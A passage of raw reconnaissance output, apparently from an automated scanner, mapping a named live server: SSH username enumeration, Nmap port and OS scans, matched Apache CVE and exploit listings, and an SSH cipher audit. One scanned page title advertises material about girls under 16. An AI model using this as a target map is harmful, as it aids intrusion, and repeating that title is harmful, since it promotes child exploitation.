1839[+] 185.82.200.52:22 - SSH - User 'user' found
1840[+] 185.82.200.52:22 - SSH - User 'webmaster' found
1841[+] 185.82.200.52:22 - SSH - User 'www-data' found
1842[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
1843[*] Scanned 1 of 1 hosts (100% complete)
1844[*] Auxiliary module execution completed
1845#######################################################################################################################################
1846HTTP/1.1 200 OK
1847Date: Tue, 22 Oct 2019 09:53:28 GMT
1848Server: Apache/2.4.10 (Debian)
1849Content-Type: text/html; charset=UTF-8
1850#######################################################################################################################################
1851http://www.javpetite.top [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[text/javascript], Title[Please wait ...]
1852#######################################################################################################################################
1853wig - WebApp Information Gatherer
1854
1855
1856Scanning http://www.javpetite.top...
1857________________________ SITE INFO _________________________
1858IP Title
1859185.82.200.52 Please wait ...
1860
1861_________________________ VERSION __________________________
1862Name Versions Type
1863Apache 2.4.10 Platform
1864Debian 8.0 | 8.0 (pre-release) OS
1865
1866____________________________________________________________
1867Time: 68.2 sec Urls: 809 Fingerprints: 40401
1868#######################################################################################################################################
1869Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:54 EDT
1870NSE: Loaded 163 scripts for scanning.
1871NSE: Script Pre-scanning.
1872Initiating NSE at 05:54
1873Completed NSE at 05:54, 0.00s elapsed
1874Initiating NSE at 05:54
1875Completed NSE at 05:54, 0.00s elapsed
1876Initiating Parallel DNS resolution of 1 host. at 05:54
1877Completed Parallel DNS resolution of 1 host. at 05:54, 0.02s elapsed
1878Initiating SYN Stealth Scan at 05:54
1879Scanning www.javpetite.top (185.82.200.52) [1 port]
1880Discovered open port 80/tcp on 185.82.200.52
1881Completed SYN Stealth Scan at 05:54, 0.28s elapsed (1 total ports)
1882Initiating Service scan at 05:54
1883Scanning 1 service on www.javpetite.top (185.82.200.52)
1884Completed Service scan at 05:55, 6.43s elapsed (1 service on 1 host)
1885Initiating OS detection (try #1) against www.javpetite.top (185.82.200.52)
1886Retrying OS detection (try #2) against www.javpetite.top (185.82.200.52)
1887Initiating Traceroute at 05:55
1888Completed Traceroute at 05:55, 0.29s elapsed
1889Initiating Parallel DNS resolution of 7 hosts. at 05:55
1890Completed Parallel DNS resolution of 7 hosts. at 05:55, 0.29s elapsed
1891NSE: Script scanning 185.82.200.52.
1892Initiating NSE at 05:55
1893Completed NSE at 05:56, 59.39s elapsed
1894Initiating NSE at 05:56
1895Completed NSE at 05:56, 1.40s elapsed
1896Nmap scan report for www.javpetite.top (185.82.200.52)
1897Host is up (0.23s latency).
1898rDNS record for 185.82.200.52: latina.petite.guru
1899
1900PORT STATE SERVICE VERSION
190180/tcp open http Apache httpd 2.4.10 ((Debian))
1902| http-brute:
1903|_ Path "/" does not require authentication
1904|_http-chrono: Request times for /; avg: 1460.86ms; min: 1180.20ms; max: 1827.31ms
1905| http-csrf:
1906| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.javpetite.top
1907| Found the following possible CSRF vulnerabilities:
1908|
1909| Path: http://www.javpetite.top:80/
1910| Form id:
1911|_ Form action: http://www.javpetite.top/reviews/index.html
1912|_http-date: Tue, 22 Oct 2019 09:55:31 GMT; -2s from local time.
1913|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
1914|_http-dombased-xss: Couldn't find any DOM based XSS.
1915|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
1916|_http-errors: Couldn't find any error pages.
1917|_http-feed: Couldn't find any feeds.
1918|_http-fetch: Please enter the complete path of the directory to save data in.
1919| http-headers:
1920| Date: Tue, 22 Oct 2019 09:55:22 GMT
1921| Server: Apache/2.4.10 (Debian)
1922| Connection: close
1923| Content-Type: text/html; charset=UTF-8
1924|
1925|_ (Request type: HEAD)
1926|_http-jsonp-detection: Couldn't find any JSONP endpoints.
1927| http-methods:
1928|_ Supported Methods: GET HEAD POST OPTIONS
1929|_http-mobileversion-checker: No mobile version detected.
1930| http-php-version: Logo query returned unknown hash 9e262ae055edff55cc46a9f869e83776
1931|_Credits query returned unknown hash 9e262ae055edff55cc46a9f869e83776
1932|_http-security-headers:
1933|_http-server-header: Apache/2.4.10 (Debian)
1934| http-sitemap-generator:
1935| Directory structure:
1936| /
1937| Other: 1
1938| /reviews/
1939| html: 1
1940| /reviews/banner/
1941| jpg: 1
1942| /reviews/img/
1943| jpg: 3
1944| /reviews/met-art/img/
1945| jpg: 1
1946| /reviews/rikitake/
1947| jpg: 1
1948| /reviews/rikitake/rikitakecom/
1949| jpg: 1
1950| Longest directory structure:
1951| Depth: 3
1952| Dir: /reviews/rikitake/rikitakecom/
1953| Total files found (by extension):
1954|_ Other: 1; html: 1; jpg: 7
1955|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1956|_http-title: Please wait ...
1957| http-vhosts:
1958|_127 names had status 200
1959|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
1960|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
1961|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
1962|_http-xssed: No previously reported XSS vuln.
1963| vulners:
1964| cpe:/a:apache:http_server:2.4.10:
1965| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
1966| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
1967| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
1968| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
1969| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
1970| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
1971| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
1972| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
1973| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
1974| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
1975| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
1976| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
1977| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
1978| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
1979| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
1980| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
1981| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
1982| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
1983| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
1984| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
1985| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
1986|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
1987| vulscan: VulDB - https://vuldb.com:
1988| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
1989| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
1990| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
1991| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
1992| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
1993| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
1994| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
1995|
1996| MITRE CVE - https://cve.mitre.org:
1997| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
1998| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
1999| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
2000| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
2001| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
2002| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
2003| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
2004| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
2005| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
2006| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
2007|
2008| SecurityFocus - https://www.securityfocus.com/bid/:
2009| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
2010| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
2011| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
2012| [15177] PHP Apache 2 Local Denial of Service Vulnerability
2013| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
2014| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
2015| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
2016| [5485] Apache 2.0 Path Disclosure Vulnerability
2017| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
2018| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
2019| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
2020| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
2021|
2022| IBM X-Force - https://exchange.xforce.ibmcloud.com:
2023| [75211] Debian GNU/Linux apache 2 cross-site scripting
2024|
2025| Exploit-DB - https://www.exploit-db.com:
2026| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
2027| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
2028| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
2029| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
2030| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
2031| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
2032| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
2033| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
2034| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
2035| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
2036| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
2037| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
2038| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
2039| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
2040| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
2041| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
2042| [21719] Apache 2.0 Path Disclosure Vulnerability
2043| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
2044| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
2045| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
2046| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
2047| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
2048| [17691] Apache Struts < 2.2.0 - Remote Command Execution
2049| [15319] Apache 2.2 (Windows) Local Denial of Service
2050| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
2051| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
2052| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
2053| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
2054| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2055| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2056| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
2057| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
2058| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
2059| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
2060| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
2061| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
2062| [9] Apache HTTP Server 2.x Memory Leak Exploit
2063|
2064| OpenVAS (Nessus) - http://www.openvas.org:
2065| [855524] Solaris Update for Apache 2 120544-14
2066| [855077] Solaris Update for Apache 2 120543-14
2067| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
2068| [72626] Debian Security Advisory DSA 2579-1 (apache2)
2069| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
2070| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
2071| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
2072| [71256] Debian Security Advisory DSA 2452-1 (apache2)
2073| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
2074| [70724] Debian Security Advisory DSA 2405-1 (apache2)
2075| [70235] Debian Security Advisory DSA 2298-2 (apache2)
2076| [70233] Debian Security Advisory DSA 2298-1 (apache2)
2077| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
2078| [69338] Debian Security Advisory DSA 2202-1 (apache2)
2079| [65131] SLES9: Security update for Apache 2 oes/CORE
2080| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
2081| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
2082| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
2083| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
2084| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
2085| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
2086| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
2087| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
2088| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
2089| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
2090| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
2091| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
2092| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
2093| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
2094| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
2095| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
2096| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
2097| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
2098| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
2099| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
2100| [11092] Apache 2.0.39 Win32 directory traversal
2101| [66081] SLES11: Security update for Apache 2
2102| [66074] SLES10: Security update for Apache 2
2103| [66070] SLES9: Security update for Apache 2
2104| [65893] SLES10: Security update for Apache 2
2105| [65888] SLES10: Security update for Apache 2
2106| [65510] SLES9: Security update for Apache 2
2107| [65249] SLES9: Security update for Apache 2
2108| [65230] SLES9: Security update for Apache 2
2109| [65228] SLES9: Security update for Apache 2
2110| [65207] SLES9: Security update for Apache 2
2111| [65136] SLES9: Security update for Apache 2
2112| [65017] SLES9: Security update for Apache 2
2113|
2114| SecurityTracker - https://www.securitytracker.com:
2115| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
2116| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
2117| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
2118| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
2119| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
2120|
2121| OSVDB - http://www.osvdb.org:
2122| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
2123|_
2124Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2125Device type: general purpose|broadband router|WAP|webcam
2126Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
2127OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
2128Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
2129No exact OS matches for host (test conditions non-ideal).
2130Uptime guess: 46.244 days (since Fri Sep 6 00:04:20 2019)
2131Network Distance: 7 hops
2132TCP Sequence Prediction: Difficulty=259 (Good luck!)
2133IP ID Sequence Generation: All zeros
2134
2135TRACEROUTE (using port 80/tcp)
2136HOP RTT ADDRESS
21371 284.06 ms 10.247.204.1
21382 284.42 ms 45.131.5.3
21393 284.21 ms 109.236.95.230
21404 284.36 ms 109.236.95.179
21415 284.39 ms 190.2.158.155
21426 284.35 ms 185.106.120.66
21437 284.31 ms latina.petite.guru (185.82.200.52)
2144
2145NSE: Script Post-scanning.
2146Initiating NSE at 05:56
2147Completed NSE at 05:56, 0.00s elapsed
2148Initiating NSE at 05:56
2149Completed NSE at 05:56, 0.00s elapsed
2150#######################################################################################################################################
2151------------------------------------------------------------------------------------------------------------------------
2152
2153[ ! ] Starting SCANNER INURLBR 2.1 at [22-10-2019 05:56:32]
2154[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
2155It is the end user's responsibility to obey all applicable local, state and federal laws.
2156Developers assume no liability and are not responsible for any misuse or damage caused by this program
2157
2158[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.javpetite.top/output/inurlbr-www.javpetite.top ]
2159[ INFO ][ DORK ]::[ site:www.javpetite.top ]
2160[ INFO ][ SEARCHING ]:: {
2161[ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.tz ]
2162
2163[ INFO ][ SEARCHING ]::
2164-[:::]
2165[ INFO ][ ENGINE ]::[ GOOGLE API ]
2166
2167[ INFO ][ SEARCHING ]::
2168-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2169[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.mv ID: 010479943387663786936:wjwf2xkhfmq ]
2170
2171[ INFO ][ SEARCHING ]::
2172-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2173
2174[ INFO ][ TOTAL FOUND VALUES ]:: [ 8 ]
2175
2176
2177 _[ - ]::--------------------------------------------------------------------------------------------------------------
2178|_[ + ] [ 0 / 8 ]-[05:56:53] [ - ]
2179|_[ + ] Target:: [ http://www.javpetite.top/ ]
2180|_[ + ] Exploit::
2181|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2182|_[ + ] More details:: / - / , ISP:
2183|_[ + ] Found:: UNIDENTIFIED
2184
2185 _[ - ]::--------------------------------------------------------------------------------------------------------------
2186|_[ + ] [ 1 / 8 ]-[05:56:55] [ - ]
2187|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_new.php ]
2188|_[ + ] Exploit::
2189|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2190|_[ + ] More details:: / - / , ISP:
2191|_[ + ] Found:: UNIDENTIFIED
2192
2193 _[ - ]::--------------------------------------------------------------------------------------------------------------
2194|_[ + ] [ 2 / 8 ]-[05:56:57] [ - ]
2195|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_005.php ]
2196|_[ + ] Exploit::
2197|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2198|_[ + ] More details:: / - / , ISP:
2199|_[ + ] Found:: UNIDENTIFIED
2200
2201 _[ - ]::--------------------------------------------------------------------------------------------------------------
2202|_[ + ] [ 3 / 8 ]-[05:56:58] [ - ]
2203|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_001.php ]
2204|_[ + ] Exploit::
2205|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2206|_[ + ] More details:: / - / , ISP:
2207|_[ + ] Found:: UNIDENTIFIED
2208
2209 _[ - ]::--------------------------------------------------------------------------------------------------------------
2210|_[ + ] [ 4 / 8 ]-[05:57:00] [ - ]
2211|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_003.php ]
2212|_[ + ] Exploit::
2213|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2214|_[ + ] More details:: / - / , ISP:
2215|_[ + ] Found:: UNIDENTIFIED
2216
2217 _[ - ]::--------------------------------------------------------------------------------------------------------------
2218|_[ + ] [ 5 / 8 ]-[05:57:01] [ - ]
2219|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_004.php ]
2220|_[ + ] Exploit::
2221|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2222|_[ + ] More details:: / - / , ISP:
2223|_[ + ] Found:: UNIDENTIFIED
2224
2225 _[ - ]::--------------------------------------------------------------------------------------------------------------
2226|_[ + ] [ 6 / 8 ]-[05:57:03] [ - ]
2227|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_002.php ]
2228|_[ + ] Exploit::
2229|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2230|_[ + ] More details:: / - / , ISP:
2231|_[ + ] Found:: UNIDENTIFIED
2232
2233 _[ - ]::--------------------------------------------------------------------------------------------------------------
2234|_[ + ] [ 7 / 8 ]-[05:57:05] [ - ]
2235|_[ + ] Target:: [ http://www.javpetite.top/reviews/rikitake_006.php ]
2236|_[ + ] Exploit::
2237|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
2238|_[ + ] More details:: / - / , ISP:
2239|_[ + ] Found:: UNIDENTIFIED
2240
2241[ INFO ] [ Shutting down ]
2242[ INFO ] [ End of process INURLBR at [22-10-2019 05:57:05]
2243[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
2244[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.javpetite.top/output/inurlbr-www.javpetite.top ]
2245|_________________________________________________________________________________________
2246
2247\_________________________________________________________________________________________/
2248#######################################################################################################################################
2249https://www.javpetite.top [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
2250#######################################################################################################################################
2251Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:27 EDT
2252Nmap scan report for latina.petite.guru (185.82.200.52)
2253Host is up (0.25s latency).
2254Not shown: 996 closed ports
2255PORT STATE SERVICE
225622/tcp open ssh
225780/tcp open http
2258443/tcp open https
225910000/tcp open snet-sensor-mgmt
2260
2261Nmap done: 1 IP address (1 host up) scanned in 2.48 seconds
2262#######################################################################################################################################
2263(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
2264(gen) software: OpenSSH 6.7p1
2265(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
2266(gen) compression: enabled (zlib@openssh.com)
2267
2268# key exchange algorithms
2269(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2270(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2271 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2272(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2273 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2274(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2275 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2276(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2277 `- [info] available since OpenSSH 4.4
2278(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2279 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2280
2281# host-key algorithms
2282(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2283(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
2284 `- [warn] using small 1024-bit modulus
2285 `- [warn] using weak random number generator could reveal the key
2286 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2287(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2288 `- [warn] using weak random number generator could reveal the key
2289 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2290(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2291
2292# encryption algorithms (ciphers)
2293(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2294(enc) aes192-ctr -- [info] available since OpenSSH 3.7
2295(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2296(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2297(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2298(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2299 `- [info] default cipher since OpenSSH 6.9.
2300
2301# message authentication code algorithms
2302(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2303 `- [info] available since OpenSSH 6.2
2304(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2305(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2306(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2307(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2308 `- [info] available since OpenSSH 6.2
2309(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2310 `- [warn] using small 64-bit tag size
2311 `- [info] available since OpenSSH 4.7
2312(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2313 `- [info] available since OpenSSH 6.2
2314(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2315 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2316(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2317 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2318(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2319 `- [warn] using weak hashing algorithm
2320 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2321
